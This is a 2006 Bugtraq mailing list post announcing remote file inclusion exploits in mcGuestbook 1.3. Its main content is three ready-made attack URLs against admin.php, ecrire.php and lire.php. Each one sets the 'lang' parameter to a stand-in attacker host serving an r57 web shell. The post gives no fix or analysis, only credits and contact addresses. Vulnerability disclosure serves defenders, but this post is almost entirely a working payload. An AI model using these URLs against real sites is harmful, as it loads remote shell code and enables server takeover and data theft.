Bugtraq mailing list archives

file include exploits in mcGuestbook 1.3

From: "SWEET SWEET" <gamr-14 () hotmail com>
Date: Fri, 16 Jun 2006 20:09:58 +0300

Multiple file include exploits in mcGuestbook 1.3

script type : mcGuestbook 1.3
bug found by : sweet-devil
team : site-down
type : file include

####################################################
exploits :


admin.php

http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?

ecrire.php

http://www.example.com/path/ecrire.php?lang=http://yoursite/r57shell.txt?

lire.php

http://www.example.com/path/lire.php?lang=http://yoursite/r57shell.txt?

####################################################


#######################
emails:

gamr-14 () hotmail com  &  black-cod3 () hotmail com
#######################


All my respect to our friends , lezr.com


done .. peace

_________________________________________________________________

FREE pop-up blocking with the new MSN Toolbar - get it now!http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

Current thread:

file include exploits in mcGuestbook 1.3 gamr-14 (Jun 13)
- <Possible follow-ups>
- file include exploits in mcGuestbook 1.3 SWEET SWEET (Jun 16)